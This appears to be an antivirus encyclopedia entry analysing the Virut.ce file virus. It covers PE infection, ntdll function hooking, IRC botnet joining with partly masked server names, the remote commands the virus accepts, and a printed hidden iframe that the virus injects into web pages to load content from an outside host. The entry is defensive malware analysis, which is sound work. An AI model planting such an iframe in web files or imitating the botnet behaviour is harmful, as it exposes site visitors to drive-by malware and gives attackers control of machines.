Virus.Win32.Virut.ce

Technical Details

This file virus infects Windows executable files. It is a malicious code contained in Windows PE EXE files. The virus body is about 17 Kb, though the use of polymorphic encryption means its size may vary.


Propagation


The virus injects its code into the address spaces of all the processes running in the system. The injected code intercepts the following system functions in the ntdll.dll library:

NtCreateFile
NtCreateProcess
NtCreateProcessEx
NtOpenFile
NtQueryInformationProcess

Using these system functions, the virus tracks files that are opened and any applications launched for execution. When the virus detects a new process being launched or an executable file being opened, it infects it. Files with .EXE and .SCR extensions are infected. These files are Windows (PE EXE) applications. The virus does not infect files with names containing any of the following strings: “WINC”, “WCUN”, “WC32”, “PSTO”. When infecting a file, the virus expands the PE section and writes its own polymorphic body into it. It then modifies the program’s entry point so that it leads to the virus code.

Payload

The virus adds the executable file of the host process to the Windows firewall list of trusted applications.


Then it disables the “Restore system files” function.


The virus attempts to contact the following IRC servers:

prox*****ircgalaxy.pl
irc*****ef.pl

If a connection is established, the virus sends the following commands to the server:
NICK dewxxpyi
USER b
JOIN #.<rnd1>, where rnd1 is a random number.

Then the virus enters standby mode, ready to receive commands from the malicious IRC server and execute them.


The virus is capable of executing the following commands:

  • !Get: download a malicious code from the Internet and inject it into processes running on the victim computer.
  • !hosu: open specified URLs on the victim computer.


The virus also scans the victim computer’s hard drive for files with the following extensions:

HTM
PHP
ASP
If found, it adds the following string into them:
<iframe src="http://****.pl/rc/" width=1 height=1
style="border:0"></iframe>

Removal Instructions

If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program: Update your Kaspersky Anti-Virus databases and perform a full scan of the computer (download trial version).